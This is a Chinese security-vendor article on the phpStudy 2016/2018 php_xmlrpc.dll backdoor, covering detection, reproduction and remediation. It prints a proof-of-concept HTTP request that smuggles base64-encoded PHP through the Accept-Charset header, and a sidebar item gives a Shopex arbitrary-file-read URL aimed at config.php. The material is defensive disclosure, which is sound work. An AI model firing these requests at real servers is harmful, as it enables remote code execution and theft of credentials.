开发者社区> 网站安全> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

phpstudy 漏洞分析与利用POC 包含漏洞补丁

简介: phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。
+关注继续查看

phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详情,我们来安全分析一下,以及复现,漏洞修复,三个方面来入手。
330850_1F30922423428
国内大部分的服务器尤其windows系统,都有安装phpstudy一键环境搭建软件,该软件可以自动设置安装apache,php,mysql数据库,以及zend安装,并自动设置root账号密码,一键化操作,深受广大网站运营以及服务器维护者的喜欢,正因为使用的人较多,导致被攻击者盯上并植入木马后门到exe程序包中。

该后门文件是PHP环境当中的php_xmlrpc.dll模块被植入木马后门,具体的名称,经过我们SINE安全技术的安全检测,可以确定是phpstudy2016.11.03版本,以及phpstudy2018.02.11版本,后门文件如下:

3

phpphp-5.2.17extphp_xmlrpc.dll

phpphp-5.4.45extphp_xmlrpc.dll

PHPTutorialphpphp-5.2.17extphp_xmlrpc.dll

PHPTutorialphpphp-5.4.45extphp_xmlrpc.dll

在phpstudy文件夹下面搜索php_xmlrpc.dll文件,看下这个dll文件里是否包含@eval(%s('%s'))内容的字符,如果有的话,基本上就是有木马后门了。截图如下:
1

我们来分析复现漏洞看下,是否可以成功的利用,首先本地安装phpstudy2016.11.03版本的安装压缩包,解压到当前目录直接点击EXE运行即可,默认安装的PHP版本就是php5.4.45版本,然后本地打开看下,用抓包工具检测当前的数据包。

2

GET /safe.php HTTP/1.1

Host:

Cache-Control: max-age=1

Upgrade-Insecure-Requests: 2

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Accept:

Accept-Language: zh-CN,zh;q=0.6

Accept-Encoding:gzip

Accept-Charset:=cGhwaW5mbyUyOCUyOSUzQg==(这个是POC代码加密的)

Cookie: Hm_lpvt_49143271fe785debb3b77f77f7c71752=1569485559;

Connection: close

漏洞的执行位置是在数据包的Accept-Charset里,这里写入恶意代码加密的phpinfo,然后提交过去,就会执行phpinfo语句。
5

关于phpstudy漏洞的修复办法,从phpstudy官方网站下载最新的版本,将php_xmlrpc.dll进行替换到旧版本里即可,对PHP的Accept-Charset的参数传输做安全过滤与效验防止提交恶意参数,禁止代码的传输,即可修复此漏洞,(经证实对此phpstudy官方公告此后门是黑客之前入侵了官网篡改了程序包导致的安全问题,强烈鄙视黑客的行为!)如果您对代码不是太了解的话,也可以找专业的网站安全公司来处理解决,国内SINESAFE,启明星辰,绿盟都是比较不错的,目前该漏洞影响范围较广,请各位网站运营者尽快修复漏洞,打好补丁,防止网站被攻击,被篡改。

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Thinkphp网站漏洞怎么修复解决
THINKPHP漏洞修复,官方于近日,对现有的thinkphp5.0到5.1所有版本进行了升级,以及补丁更新,这次更新主要是进行了一些漏洞修复,最严重的就是之前存在的SQL注入漏洞,以及远程代码执行查询系统的漏洞都进行了修复,官方本以为没有问题了,但是在实际的安全检测当中发现,还是存在问题,还是可以远程代码进行注入,插入非法字符,提交到服务器后端中去。
0 0
ecshop 全系列版本通杀漏洞 远程代码执行sql注入漏洞
ecshop漏洞于2018年9月12日被某安全组织披露爆出,该漏洞受影响范围较广,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影响,主要漏洞是利用远程代码执行sql注入语句漏洞,导致可以插入sql查询代码以及写入代码到网站服务器里,严重的可以直接获取服务器的管理员权限,甚至有些网站使用的是虚拟主机,可以直接获取网站ftp的权限,该漏洞POC已公开,使用简单,目前很多商城网站都被攻击,危害较大,针对于此我们SINE安全对该ECSHOP漏洞的详情以及如何修复网站的漏洞,及如何部署网站安全等方面进行详细的解读。
0 0
CVE-2019-1181 漏洞修复补丁下载 POC暂时未发布
2019年8月14日,微软发布更新了windows的系统补丁,代号:CVE-2019-1181,CVE-2019-1182补丁针对与windows远程桌面远程代码执行漏洞进行了全面的修复,根据SINE安全技术对补丁的分析发现修复的这两个漏洞,可以造成攻击者通过远程链接的方式绕过管理员的身份安全验证...
1894 0
Shopex V4.8.4|V4.8.5下载任意文件漏洞
利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键。 自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下。 找到一个漏洞,还是发出来吧。 读取任意文件漏洞: http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php 复制代码可以连上数据库。
1377 0
+关注
网站安全
Sinesafe专注于网站安全,服务器安全,解决各类网络安全问题,对代码审计以及漏洞修补安全加固有专业的十年实战经验.官方站点www.sinesafe.com
文章
问答
文章排行榜
最热
最新
相关电子书
更多
15分钟打造你自己的小程序更新版
立即下载
代码未写,漏洞已出
立即下载
如何产生威胁情报-高级恶意攻击案例分析
立即下载